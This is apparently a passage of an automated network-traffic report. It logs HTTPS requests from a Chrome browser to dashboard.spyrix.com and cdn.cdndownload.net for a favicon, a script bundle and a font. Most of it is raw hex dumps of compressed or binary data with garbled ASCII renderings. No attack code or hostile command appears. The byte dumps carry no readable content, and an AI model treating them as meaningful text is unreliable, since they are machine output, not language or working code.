2a bb 58 1e db 41 3f 63 56 5d 38 08 bc c4 ea 65 8c 94 a8 fc c4 f9 d7 ed 95 0c b4 71 e1 a9 6e 70 57 4b 92 c4 60 62 c1 84 3e cd 13 c2 f8 8b eb 33 fa c2 Data Ascii: z3%t4OkK\|NQ<G__::fWUiF`8[VTqv0\|It?_'x7 -"VGF@I;0@]t%nab5h#,m+Wnbh/zi3"BH}cT8\*XA?cV]8eqnpWK`b>3
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: c6 09 8b 2d 53 db 5c 99 a1 48 5a 4b c7 98 f7 34 1c e7 d3 40 75 8f 32 34 13 91 e3 40 f2 a9 7e 9d ab a2 8e c4 5d 5e 14 a5 5a 55 0f 24 42 52 5d d1 42 58 90 c9 33 12 b7 0e 16 89 2f 80 11 1a c4 ca 8b 54 c6 ca 7f 54 75 37 ce 18 8a 31 a1 f8 74 50 c7 73 f7 b8 fe b2 95 54 82 88 75 0c e9 13 aa fd 22 3c 93 a1 d7 a2 2e 7e 59 ba 75 08 51 17 12 10 25 5a f8 a8 12 bf bc c1 d1 26 28 38 1b 82 f3 79 05 a2 7b 16 fd 93 52 fc 0e c5 60 10 f2 ba a9 2d a2 af 6a 6c c7 4a f7 14 a6 64 c1 14 56 56 89 35 2c 84 89 35 f5 37 ee 40 ff 0d 57 af c6 13 ee 0f f1 f6 16 24 ed a2 76 81 6b e8 50 dd 5a ff a6 d5 b8 37 c2 e8 64 a2 59 2d 09 0e d8 de da 38 13 16 d9 06 55 17 a6 df d5 d6 c6 c3 d6 1b cb 02 12 fe e1 79 80 60 0d 4c 31 67 37 eb 7c c6 95 3a d1 c4 55 c1 bc 04 b3 75 18 ac af 8f 61 ee f1 7b 81 Data Ascii: -S\HZK4@u24@~]^ZU$BR]BX3/TTu71tPsTu"<.~YuQ%Z&(8y{R`-jlJdVV5,57@W$vkPZ7dY-8Uy`L1g7\|:Uua{
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: 20 4b 3d 3a 7c 83 6d ae 34 bf 29 a1 69 51 e5 be 9e 5b e0 00 79 d8 63 8b 90 47 c0 7f 3a ab 1e 54 0d ba 67 21 dc e2 05 4e 93 17 3e 01 96 fb 78 f6 49 72 c0 d9 11 59 fe 7c e6 94 44 1f cf 22 ca d3 a7 03 e6 18 ca ac 54 c6 fa 61 2c 29 26 2e 35 dc 3e 38 30 4b 5f 28 7f 5c ed b2 7b 46 69 ed de 2e f7 b4 f6 9c 5b 1c ba ea ee 7d 81 20 77 05 b5 4b 7b bf 76 6f 97 0f be df 75 03 b5 01 ac 5c 6b 04 2b 05 56 b1 de c6 5d f2 cd 69 76 83 36 c2 67 a0 be 21 f8 0f 51 ce 6b 3f 9c bb 91 7a 92 1e ec 3b e3 01 a4 e7 c6 e9 e6 dd 98 ce 97 6c 46 d8 f7 91 b5 b4 c2 46 78 cb 3a c9 73 4b 2e f2 eb e3 0a a0 72 38 6f c3 1d 6f ca 76 27 6a c6 51 84 cd 99 d7 7c bc f4 63 cd 61 c3 85 d5 aa 4a 78 fa 0c 63 a3 24 79 d7 f6 a5 0e d2 ce c4 f9 2f 2d 03 32 9a 02 da 3e 16 dd 4b 7f ec d7 4b be 16 32 8f bf c3 Data Ascii: K=:\|m4)iQ[ycG:Tg!N>xIrY\|D"Ta,)&.5>80K_(\{Fi.[} wK{vou\k+V]iv6g!Qk?z;lFFx:sK.r8oov'jQ\|caJxc$y/-2>KK2
2024-10-02 04:11:38 UTC	2044	IN	Data Raw: 9b c0 aa f2 eb ab 5a c5 49 37 fb a1 69 29 36 ae 8d 78 a5 87 b2 9b 7b f9 69 6d 97 4e 92 4f 98 32 51 a2 48 71 29 43 38 5a 2e 00 82 9a 2f e2 3d 03 71 71 76 18 b8 2c e2 96 ee d2 23 04 8c 89 2f c8 8e 68 df f2 ab af cf bc df 7a be 4f 7e 75 a6 4c 80 44 f2 c9 f8 4f fc 2c f1 27 01 61 dc e2 23 f0 2e c5 a4 3e 46 1c 68 49 48 eb fa a9 fa f6 1a c0 7b 46 fc 09 60 4b 3e 1d 97 24 f9 a6 4f 4e 7d b1 cb 16 da 58 2b 46 80 fd bc f9 09 04 6b dd b0 f9 3d 98 59 13 a5 b3 6b 02 fb 67 9f f8 1b 00 86 7c 5a b2 59 3f 51 2f 16 69 2e 34 f1 fd 7e 42 74 25 17 d7 73 82 0d 74 71 70 8a 51 58 17 a5 0c df ba 38 dd 57 d8 04 17 ef f7 b1 c9 eb e2 d5 69 f2 dc 95 9c 12 66 6a 75 4e 93 1f dd c5 8c 30 06 95 5c 0c 92 3d bb 58 9e e2 d1 94 63 fa a5 a9 9c 2f bd 3a 5c e1 9d 8e a3 69 5b 70 6e 0a 7c f3 d7 3a Data Ascii: ZI7i)6x{imNO2QHq)C8Z./=qqv,#/hzO~uLDO,'a#.>FhIH{F`K>$ON}X+Fk=Ykg\|ZY?Q/i.4~Bt%stqpQX8WifjuN0\=Xc/:\i[pn\|:
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: 35 38 30 30 0d 0a af 93 c3 0a ce 07 92 c4 29 de aa 56 c9 f3 30 ec 61 70 eb 2b 0e 05 89 cc 87 7a a9 8a 19 b3 88 d6 cb fa 35 ab 97 0d 6a b6 3a 28 b5 e9 df 9b f1 9e 83 d7 1d 2c cf 7d 23 04 73 0c 99 f5 b7 0c cb 1a 35 59 d9 c3 c0 12 41 b2 34 25 e6 9a 84 ac f9 0f e0 8d 9d f4 b0 f3 4c 5d 1b 8a 20 35 16 74 a0 74 ac dc 1c 9d f1 de ea 0e 58 dd b1 33 97 2c da 10 01 00 58 12 e6 ca c2 51 b7 e3 8f 63 45 7e b9 68 75 04 a6 6c c0 87 1e d9 55 ca 22 40 46 10 2b b8 8f 4a 63 71 74 0e b5 6b 04 92 69 06 c0 68 42 67 82 83 7e e1 43 0a b7 35 8b 61 34 8d 8e ed 23 30 0a 29 a5 03 72 7c 49 4e b5 15 47 8c 5a 3c 0d 67 bf 2c 59 a3 d7 1a 86 a0 e1 82 fc 65 7e b5 f8 8e 09 59 67 06 02 30 6b c5 74 c4 04 b1 06 78 a2 55 54 db 17 8c 34 5a ac 08 01 a8 89 6f 4e 81 dd 2e c4 a1 70 62 57 78 d0 d7 17 Data Ascii: 5800)V0ap+z5j:(,}#s5YA4%L] 5ttX3,XQcE~hulU"@F+JcqtkihBg~C5a4#0)r\|INGZ<g,Ye~Yg0ktxUT4ZoN.pbWx
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: 1e 31 3a 37 33 09 77 6e 3a a6 5b 4a f9 74 b7 18 d7 99 c4 0b be 6b 27 61 16 65 5a c6 07 fe 32 c1 b0 d9 99 8e 14 67 78 07 d3 42 a7 0e b3 f2 4a b5 ca 8c a2 22 c0 33 23 38 4c eb d2 5d 3c 30 3b c7 64 9d b9 15 6d dd 3e 01 f8 e5 4e 0f 7d a7 ff 06 96 e0 e2 ff 6d bf 87 7c de f0 2c 7f fc 58 b4 ef e8 19 56 28 fd 6a c6 b5 09 b3 9c bb 9a f0 79 fe f4 45 e7 ea f8 3c 3f 81 8f a5 78 1b 3c 90 04 1e 6f 47 f8 22 4c 98 be 68 6a b4 5d 40 8b 98 b1 f3 d2 59 d7 f4 18 da 3b 6c b7 64 67 17 98 dd b2 5b e5 ba 5f 88 55 38 d2 88 d0 0f ba 46 f0 c8 a9 6d c3 39 42 2c 10 08 19 52 cd fe b1 37 ff 37 8b b5 67 49 2b 82 05 1a 6a ac 70 08 57 88 02 66 b1 98 af 73 78 77 44 1f 44 03 20 f6 1c a0 18 fa a0 f2 82 95 6f cf ab e7 2e 9a d9 65 8d 41 32 f0 03 7b c2 b8 de ce 6d 58 6f 0b a1 0e 9b 05 00 1e 01 Data Ascii: 1:73wn:[Jtk'aeZ2gxBJ"3#8L]<0;dm>N}m\|,XV(jyE<?x<oG"Lhj]@Y;ldg[_U8Fm9B,R77gI+jpWfsxwDD o.eA2{mXo
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: d3 f1 a2 45 de 2b 44 9d 6a 3d 14 00 84 06 42 6f 38 a8 2a ff 21 6c 41 cf dc 7c 44 8e c3 4e 49 c4 b4 fe 7c 43 00 69 5a b6 cf e5 a3 87 df fc 95 d5 b6 69 81 af e9 90 2a 18 29 18 ba 4d ee 34 a7 ea 88 0e e8 5e e9 22 d6 25 85 f5 19 cb c0 46 b8 ff a3 bf 03 5f 87 80 35 d8 8c 6d 2e ff 81 1a 24 c9 31 c0 63 86 4f 3e e7 0a 68 70 2f d1 f9 99 54 f4 e5 3c 89 41 2c 45 47 ad 4c 26 12 8c 9c 16 59 4c fe 58 cb af 15 08 b1 0f 48 a1 46 e9 00 0c 22 a0 15 0e 51 a7 7e 87 e1 79 11 9e e2 cb 90 f6 d6 ba f1 f8 08 ba 49 d4 8f 57 ec 37 af d8 df 10 8e bc a6 0f f7 a4 13 0f 03 54 46 d9 39 e5 7d ac 3c cc 16 0c 8c 82 1d f8 73 c7 93 67 70 5d 05 14 13 bf ab 71 29 4b c0 6c bb ca e1 88 1e cd ea 5a da b6 28 be a3 81 72 d4 9b a9 fc 4c f4 16 5e cb 92 3c 62 44 0c f2 42 50 17 92 5e 57 37 fe af e2 90 Data Ascii: E+Dj=Bo8!lA\|DNI\|CiZi)M4^"%F_5m.$1cO>hp/T<A,EGL&YLXHF"Q~yIW7TF9}<sgp]q)KlZ(rL^<bDBP^W7
2024-10-02 04:11:38 UTC	4096	IN	Data Raw: d5 6c 09 62 52 3b 66 45 bb dd d4 ce c0 b2 d6 1d 53 b1 36 2f bc 0d 5b 91 14 38 9c 06 58 61 18 ae e0 c3 15 b1 8b 74 e6 e2 cf 51 b4 33 68 47 39 87 97 56 3a 46 87 83 fc 50 fa 6d e7 6d fd c3 56 42 69 ba 1b 45 2a b4 51 f0 b1 d5 a7 ec 59 64 02 8e 2e 69 58 3d 63 c5 8c f3 83 ad 99 8e 86 8b 26 8a 96 fb 0f aa 22 e8 42 c5 22 d4 c6 46 49 bc b1 32 89 30 02 05 83 90 0e 2c 88 21 8b 9e 19 58 de 51 20 7e dd 9a e4 f6 44 76 e7 4b df 50 9d e9 fa 37 5c 40 42 44 89 e1 3f fa 12 ca 69 02 9b a4 5b 5a e0 c6 85 a4 20 0b 04 4c ed 1c ef e5 6a 14 a1 42 52 36 43 40 c6 8c 62 a8 68 e7 8b 76 e4 01 9e ce a0 dd 7e 98 66 83 55 8f ec e0 48 1e d9 af 39 e5 70 b2 02 bf 19 f9 f8 b9 04 32 d4 95 44 79 df bf bf 2f cf 1b 01 f1 95 68 46 7c a0 d0 21 4e 21 bb ba 88 db 8c c6 e0 60 78 3a 98 10 ee 41 21 e4 Data Ascii: lbR;fES6/[8XatQ3hG9V:FPmmVBiE*QYd.iX=c&"B"FI20,!XQ ~DvKP7\@BD?i[Z LjBR6C@bhv~fUH9p2Dy/hF\|!N!`x:A!

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:38 UTC	596	OUT	GET /favicon.ico HTTP/1.1 Host: dashboard.spyrix.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://dashboard.spyrix.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:38 UTC	320	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:11:38 GMT Content-Type: image/x-icon Content-Length: 3029 Last-Modified: Thu, 01 Feb 2024 09:41:29 GMT Connection: close ETag: "65bb6749-bd5" X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000; X-State: 3.0 Accept-Ranges: bytes
2024-10-02 04:11:38 UTC	3029	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b8 00 00 00 b8 08 06 00 00 00 50 33 26 c7 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 21 37 00 00 21 37 01 33 58 9f 7a 00 00 00 18 74 45 58 74 53 6f 66 74 77 61 72 65 00 70 61 69 6e 74 2e 6e 65 74 20 34 2e 31 2e 36 fd 4e 09 e8 00 00 0b 53 49 44 41 54 78 5e ed 9d ff 71 dc 46 12 85 15 82 43 b8 10 1c 82 43 b8 0c 4e 65 49 ae fb cf cc 40 ce 40 ce 60 c5 08 ec 0c 18 02 43 b8 10 18 02 6e 1a 9c 95 c6 d0 e3 6e 77 03 33 98 e9 79 5f d5 57 aa 6a 71 77 f1 e3 ed a0 31 00 c8 77 cb b2 b8 fd f5 b2 bc ff f8 75 59 28 ad 65 99 37 8f b0 a8 95 01 a7 b5 2d f3 e6 11 16 b5 32 e0 b4 b6 65 de 3c c2 a2 56 06 9c d6 b6 cc 9b 47 58 d4 ca 80 d3 da 96 79 f3 08 8b 5a 19 70 5a db 32 6f 1e 61 51 2b 03 Data Ascii: PNGIHDRP3&gAMAapHYs!7!73XztEXtSoftwarepaint.net 4.1.6NSIDATx^qFCCNeI@@`Cnnw3y_Wjqw1wuY(e7-2e<VGXyZpZ2oaQ+

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:38 UTC	626	OUT	GET /dashboard30/assets/en-08b2a987.js HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://dashboard.spyrix.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:39 UTC	400	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:11:39 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: W/"66fa817d-69c5" Content-Encoding: gzip Access-Control-Allow-Origin: https://dashboard.spyrix.com Cache: HIT X-Cached-Since: 2024-10-02T03:44:02+00:00 X-Node: m9-up-gc99
2024-10-02 04:11:39 UTC	3696	IN	Data Raw: 31 63 37 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 9d e9 6e dc 56 96 c7 bf cf 53 70 88 00 76 80 6b 61 d2 dd 98 1e b0 21 0c bc 24 8e 3b de e2 25 ee 04 03 a4 a9 2a 96 c4 36 8b ac 90 2c c9 4a 90 07 9a d7 98 27 9b df ff dc 7b 49 d6 22 c9 4b e2 76 3a fe 22 f1 ee db d9 cf b9 b7 66 4d dd f5 49 71 98 de 5c f7 cd aa ca cf 53 d7 1c a6 4f 8a bc 6b ea d4 f5 87 e9 9d a2 9b b5 e5 aa 2f 95 ce 0f d3 a7 7d de af bb d4 95 7c ce da a2 a8 bb 93 a6 4f 5d 7d 98 3e ea 4f 8a 36 75 dd 61 fa bc d3 47 4b a7 ab 55 45 8f 33 b2 ea 97 75 73 46 17 d5 61 7a ab 6d ce ac c6 fc 30 bd 5d 95 ab a3 26 6f e7 a9 5b 1f a6 2f 8a a3 59 be 4c dd ca c6 69 e9 f7 fc 30 fd fc 55 c9 c7 f2 30 fd a6 9c 17 4d 5b cc 52 77 42 79 b3 ae e7 96 38 f6 e3 94 b3 dc 4f 72 71 98 3e 2b fb aa 48 dd a9 fa 6f 3a be ce 0e Data Ascii: 1c75nVSpvka!$;%*6,J'{I"Kv:"fMIq\SOk/}\|O]}>O6uaGKUE3usFazm0]&o[/YLi0U0M[RwBy8Orq>+Ho:
2024-10-02 04:11:39 UTC	3597	IN	Data Raw: 23 25 16 dc 99 78 fd da 0b 49 c5 ab 15 8e 31 bf 98 ab 2a 85 9e a6 5c 67 5f 27 17 96 bb b2 46 2c 22 10 75 80 d0 79 83 91 58 46 bf e2 15 26 1d e9 6c 11 38 b7 4b 84 4f 6c 41 41 44 1f e1 3d 79 ad 46 3e 10 69 3e 88 0b bd 82 12 c2 c6 36 f5 18 b7 f2 66 8d a4 f0 12 a9 89 98 a7 d0 98 ae 0b 01 86 7b 32 11 68 2c d0 3b 43 2c a9 cd ad bd e5 16 bf b4 78 6c fd 90 b5 8c e0 c1 26 c4 76 5b 05 66 be 5f 15 84 a0 87 30 07 f9 5b 8c 24 9b e9 48 4c 1a 0f c4 65 15 8c 2a a1 2b b2 93 d8 5e 16 72 d9 c8 d3 0e 6a fb 1e 7c 5c 47 d8 c2 68 73 7a 66 ea e5 1b 34 c1 b0 1d 6d 78 59 29 35 db 9b c4 46 25 4e 76 50 26 bb 3f 7f 4f fd 05 34 c7 02 03 77 5a 84 12 cc 3c 04 b9 d4 85 b3 a0 e6 0c 47 c3 a0 88 5e 85 37 c1 33 f1 0e 98 77 51 0f 90 1d f3 49 d0 b5 87 26 ed 73 0c f1 bb b0 c8 0e 39 c8 78 db 5e Data Ascii: #%xI1\g_'F,"uyXF&l8KOlAAD=yF>i>6f{2h,;C,xl&v[f_0[$HLe+^rj\|\Ghszf4mxY)5F%NvP&?O4wZ<G^73wQI&s9x^
2024-10-02 04:11:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:40 UTC	640	OUT	GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://dashboard.spyrix.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:40 UTC	367	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:11:40 GMT Content-Type: font/woff2 Content-Length: 44112 Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: "66fa817d-ac50" Access-Control-Allow-Origin: https://dashboard.spyrix.com Cache: STALE X-Cached-Since: 2024-10-02T02:04:42+00:00 X-Node: m9p-up-gc30 Accept-Ranges: bytes
2024-10-02 04:11:40 UTC	3729	IN	Data Raw: 77 4f 46 32 00 01 00 00 00 00 ac 50 00 10 00 00 00 02 04 b8 00 00 ab ea 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 84 32 1b 82 8f 72 1c 9a 08 06 60 3f 53 54 41 54 48 00 95 2a 11 08 0a 84 b9 34 83 cb 41 0b 91 16 00 01 36 02 24 03 a1 38 04 20 05 87 5e 07 cd 35 0c 07 5b 12 c4 91 05 d6 c6 b6 43 35 a0 e0 fb c0 74 1b 02 64 5f c3 a3 3a 1f ef c5 01 e6 a6 8e 15 fd 6e 1b 00 b8 75 3d 69 58 01 37 46 6e b7 03 28 ea bc 2e bd ec ff ff ff ff ff d7 24 0b 19 db fd 33 fe f7 bf 81 93 29 e8 10 32 ad d2 82 30 aa d0 08 83 bb 23 65 32 60 34 1b 0f e5 98 90 a4 4c 1e 89 c1 1d f5 64 38 93 79 b9 8c c5 8e 10 5c 9b b3 a9 ae 44 92 e1 16 ce fb 30 58 a0 1c 7e 66 cb b6 2d 10 89 88 7c e3 85 97 60 93 a7 fd 32 a3 69 84 7e 4c c4 4e ac f0 b3 b0 22 dd 85 bd 93 cf Data Ascii: wOF2P2r`?STATH*4A6$8 ^5[C5td_:nu=iX7Fn(.$3)20#e2`4Ld8y\D0X~f-\|`2i~LN"
2024-10-02 04:11:40 UTC	4096	IN	Data Raw: ae b4 56 3a 47 e5 3c 38 c5 66 6d 00 66 b6 0a a6 7f c6 4f aa 48 6e 63 20 66 3f 51 ea 3b dd db 46 b1 50 8c 4e a8 cc 06 3a b4 41 dc c4 5d 6c f1 0e ef a5 6c 06 d0 21 b0 25 83 7b 6d 27 e6 7b 6b 5c f0 40 9e d6 42 d1 68 47 af 5d 29 41 77 48 b4 0a f1 14 eb bb e5 63 e3 12 03 ee cf 9c 15 ef 06 77 31 7a 74 6e 6b 3f 9b 42 e5 61 71 a5 b2 d0 9e de 99 da b2 f5 12 70 b5 08 19 93 a6 1c 53 db bc 0d 4c b0 d0 43 b2 94 a9 be 92 3a a7 e2 a3 cd 2e 8a 66 d2 b8 04 50 35 63 14 b6 a5 b1 a9 3a db 06 6a d7 f3 10 0b b3 58 64 7c 45 4b 91 32 e4 ad dc 15 31 bf 95 0e 94 a9 b6 e7 58 1e c0 74 0d 28 25 32 5a 35 a2 2a 8e 68 55 0b 42 01 b1 93 7d ab 27 69 3f 2f 15 95 ab d7 3d b9 54 b9 6c 20 26 a8 c8 35 c0 4f 56 b3 7d ea da 45 12 92 1b db 3a 19 37 82 32 0d 40 eb e3 d2 c7 ec fa 8c 98 57 13 45 5a Data Ascii: V:G<8fmfOHnc f?Q;FPN:A]ll!%{m'{k\@BhG])AwHcw1ztnk?BaqpSLC:.fP5c:jXd\|EK21Xt(%2Z5*hUB}'i?/=Tl &5OV}E:72@WEZ
2024-10-02 04:11:40 UTC	4096	IN	Data Raw: 81 5a dd 4b 10 c2 b2 ee 5f 70 1d 76 cd fa ec 56 60 31 eb 16 53 4b 37 2b 54 cd c5 de 8f 83 de c6 75 e3 4a 14 37 da 22 e1 70 ed d7 d8 04 b5 ef ff a8 e4 f7 cb d2 01 3d 02 ce 0c 5d 8c 4a a4 1a 4a 6b 05 22 db 51 8e 44 05 1a c1 0b 6b 6a e7 d5 b2 08 23 0b ec f3 97 a6 0a 88 75 d5 9d 55 37 43 c6 bd 57 0e 21 3e 0e ad 4e 97 01 7a 39 80 7c e3 3c ba 8a 3a f8 42 69 5c 80 30 e8 de bc 7d 5d bf a5 81 90 65 69 f4 bd ab ad 35 d4 fa eb 3b 3c c4 7d f5 37 af ae d3 e8 93 54 38 cb 16 88 75 cf 81 2e fd 51 9b 19 e8 a5 89 04 96 02 05 bb 02 03 0b 58 7a 7c e4 6b 5d 80 4b 9f 17 74 0b b0 ec 48 3f bd 77 29 9d 64 ec a1 07 44 ae 55 00 c8 4b 45 50 9b d0 f1 ad 54 b7 de 82 32 f6 70 de 6f 10 93 3b 8e f8 f2 6e 53 c9 02 01 1f a0 0b a0 51 ab ee 4e 9e 3e 60 44 b1 92 ee e1 04 5a 5a c9 da 7b c4 81 Data Ascii: ZK_pvV`1SK7+TuJ7"p=]JJk"QDkj#uU7CW!>Nz9\|<:Bi\0}]ei5;<}7T8u.QXz\|k]KtH?w)dDUKEPT2po;nSQN>`DZZ{
2024-10-02 04:11:40 UTC	4096	IN	Data Raw: a4 5d f9 3a 54 54 b1 ce 95 2a af 5c 59 65 2a aa 60 af 46 cf 1a f4 ae 59 af 9a 6a d4 af 36 33 cb 35 b8 38 d3 cb b6 b8 e7 56 54 66 55 15 56 56 6e 43 75 b6 d6 6c 4b 4d 36 d5 60 7f 18 fb ea b2 b7 57 6e f4 de 95 de 38 da 80 eb bd 73 a9 69 d7 7a eb 6e 5f 3c 6e d1 13 6f fb e9 7d 1b de f5 cb c4 1e 3a d3 98 17 ad 09 14 1e 4d 27 5d ab d2 43 ff da 49 fd 0a 6a a4 af d0 9c 9e d0 16 03 86 f0 30 af 02 42 00 dc a8 61 90 9c 50 66 72 8d f2 68 59 d0 a8 52 cd 28 c7 ea 2a ad ad da f1 86 5c 8e 60 5b 2d 0e 84 e5 da 60 88 36 a6 74 8b 7a 66 6c 19 5e e5 d3 cb a0 d5 a8 4d c6 f3 4c 9f 55 67 d6 5b 2e 30 2d 33 34 53 34 dd e6 b8 50 45 53 5c 50 e5 76 e8 db f9 e0 6b 76 f0 8f 78 09 6c ac f4 d2 18 a5 33 a9 4a 65 16 c0 24 a5 81 c2 10 91 50 c5 49 44 43 c7 c0 26 23 a7 a4 a0 a2 96 2c 85 96 81 Data Ascii: ]:TT\Ye`FYj6358VTfUVVnCulKM6`Wn8sizn_<no}:M']CIj0BaPfrhYR(*\`[-`6tzfl^MLUg[.0-34S4PES\Pvkvxl3Je$PIDC&#,
2024-10-02 04:11:40 UTC	4096	IN	Data Raw: 53 1a a1 cc 93 1a c6 b8 cd 67 63 2a e4 a4 af c8 98 a7 64 aa 75 44 86 a6 3d 81 69 29 80 2d ab 0f bf 90 74 6f b1 32 c7 f6 3c 49 ce 39 0a 96 e4 14 f6 47 15 50 c7 fa 34 61 d9 e4 30 6c 89 7e ca d4 c4 18 3c f1 75 ec 53 a0 44 1b 57 0e f4 d5 ba a8 8b 79 87 12 56 15 4c a9 32 74 59 62 6b ad 49 aa 84 16 d3 d8 76 55 88 81 a3 c7 c4 74 45 2b 5b 21 ec 6b 92 e3 29 ce 98 8d ee e1 75 e9 75 7d a7 bb 04 5a 05 91 07 95 30 53 12 e7 73 53 da d9 6b de 97 9f cc 28 88 f0 1c bd 3a 81 96 33 e4 d7 06 35 31 0b bb 99 bd 48 23 a9 e9 f4 d2 97 31 6a 8a 94 30 9d 5e 01 99 d6 86 19 35 c6 d6 06 66 b4 2e c6 94 c7 d3 30 9a 22 b9 9a 0f 34 40 cd 06 c0 98 2b 11 d5 58 38 e5 60 0c e1 1d 58 c2 8a d2 16 af c3 0e b3 3d a0 30 af 9b d3 76 89 c1 0d 86 15 94 15 4e 01 f0 16 b9 e9 8f df a1 71 aa 64 5f 04 78 Data Ascii: Sgc*duD=i)-to2<I9GP4a0l~<uSDWyVL2tYbkIvUtE+[!k)uu}Z0SsSk(:351H#1j0^5f.0"4@+X8`X=0vNqd_x
2024-10-02 04:11:40 UTC	2043	IN	Data Raw: bb 8b 6a df 41 0c 62 4f da c6 34 57 55 8e 69 69 3b fe 1f a6 45 2b 0f 58 06 5c 0e a7 d1 f8 0f e4 31 0d 33 b2 07 f5 6a 42 f1 89 9a 23 34 55 55 8d 69 6e 3b d1 f9 96 f5 e1 77 7e bf cb e9 f4 3b fd df 01 f6 f5 15 7c a0 73 73 9e a9 fa 7d 2f cf 9a 20 2b fd 72 52 d6 80 ac b4 7c 6f d6 95 1b b5 f9 75 d2 cc 15 4c bc c5 3d 25 5f a7 c4 c0 08 52 32 ae f1 74 fd 77 b2 13 86 61 5a b4 ed 5b ab 1c 9b dd 9a 63 0b 7c 0b 24 42 96 07 b9 13 7f db 37 c5 f1 cc 7f f2 42 55 82 29 3f 6c 49 96 3c cc 00 6b b0 22 b4 30 df 2d e3 ba ad da a2 44 5d 7a 23 eb eb cd 5d c1 27 65 37 c7 86 e2 d4 1a 37 7d 2b 5f be c9 82 ab 21 56 62 a5 c1 0c 31 3b c3 aa 2e 89 07 b6 43 9d 4f 25 6f aa b4 dd 55 6e 7c 65 43 92 9c 2e bb c1 e8 35 fb 6b 60 05 02 33 c0 1c 8b d7 6c 4c cf 31 65 97 57 16 14 6d 9a 00 b7 ad 2d Data Ascii: jAbO4WUii;E+X\13jB#4UUin;w~;\|ss}/ +rR\|ouL=%_R2twaZ[c\|$B7BU)?lI<k"0-D]z#]'e77}+_!Vb1;.CO%oUn\|eC.5k`3lL1eWm-
2024-10-02 04:11:40 UTC	4096	IN	Data Raw: 36 e5 a3 9c 78 3d ee e6 5f 33 a8 cc df 44 8e cc 1c cf 49 2c a4 25 37 c4 f7 ad 23 c7 34 68 b2 68 63 78 49 f1 0b 2a 56 3c 07 e3 ae 1d 71 93 cc 36 8d 48 6c f2 73 00 10 3a 37 9f eb d5 7d b2 22 30 04 d1 11 6b 07 16 64 3b bc 63 9c ac 74 65 dc 6b dd 3b 2d ba 29 7a c2 f7 08 ae 7f fd ae 6a e0 b5 24 cd 2d 4c 0a 99 70 44 c5 c2 12 63 4d 6d 06 a3 27 c7 f6 32 16 63 e8 3d 59 2b e4 a1 76 ac e0 5c 6a be 01 29 14 b3 0d 5e f7 ec 19 7c 82 99 95 0f 1d d1 4c 06 87 40 87 8d 69 9e e9 45 e8 a1 0b c7 7f 96 ac 2f a5 7e 09 00 25 ad b5 62 82 41 fb e8 87 6a be a2 21 1a 00 c8 fc b3 fe ad f3 9b 75 e9 04 38 b1 6c fd 93 f8 8d 03 65 89 08 0c f1 8b b7 17 55 ac 03 be 88 90 79 1d 0b 8a 7c 19 06 08 92 04 66 e6 53 e6 ce 2d f3 22 70 89 6f 56 3e 79 f6 bc 32 3d 08 43 d4 e2 05 45 e5 eb e8 91 cf ca Data Ascii: 6x=_3DI,%7#4hhcxI*V<q6Hls:7}"0kd;ctek;-)zj$-LpDcMm'2c=Y+v\j)^\|L@iE/~%bAj!u8leUy\|fS-"poV>y2=CE
